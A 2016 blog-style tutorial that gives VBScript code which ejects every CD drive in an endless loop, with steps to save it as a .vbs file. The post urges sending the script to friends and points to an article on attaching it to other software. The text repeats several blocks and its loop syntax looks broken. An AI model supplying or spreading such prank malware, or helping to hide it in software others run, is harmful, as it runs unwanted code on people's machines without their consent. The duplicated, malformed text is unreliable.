Thursday, December 22, 2016
Make a vrius that open and close your cd drive
Make a vrius that open and close your cd drive
This is a simple tutorial to make a virus that will open and close your cd drives contionously.Making this virus is so simple, all you have to need is a notepad.Just follow the steps exactly and make fun with your friends.
Step 1
Open notepad and paste the below code exactly as it is
Step 1
Open notepad and paste the below code exactly as it is
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next cdrom
loop
End If
Step 2.
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next cdrom
loop
End If
Step 2.
save the file with anyname having extension .vbs
eg: drive.vbs
Thats it you are done.When you open this you can see the magic.You can send this to your friends and have fun.If you want to attach this with any softwares,read my article how to attach files with softwares.
Note : To kill this process just open task manager and kill wscript.exe or just restart your system.
eg: drive.vbs
Thats it you are done.When you open this you can see the magic.You can send this to your friends and have fun.If you want to attach this with any softwares,read my article how to attach files with softwares.
Note : To kill this process just open task manager and kill wscript.exe or just restart your system.
Available link for download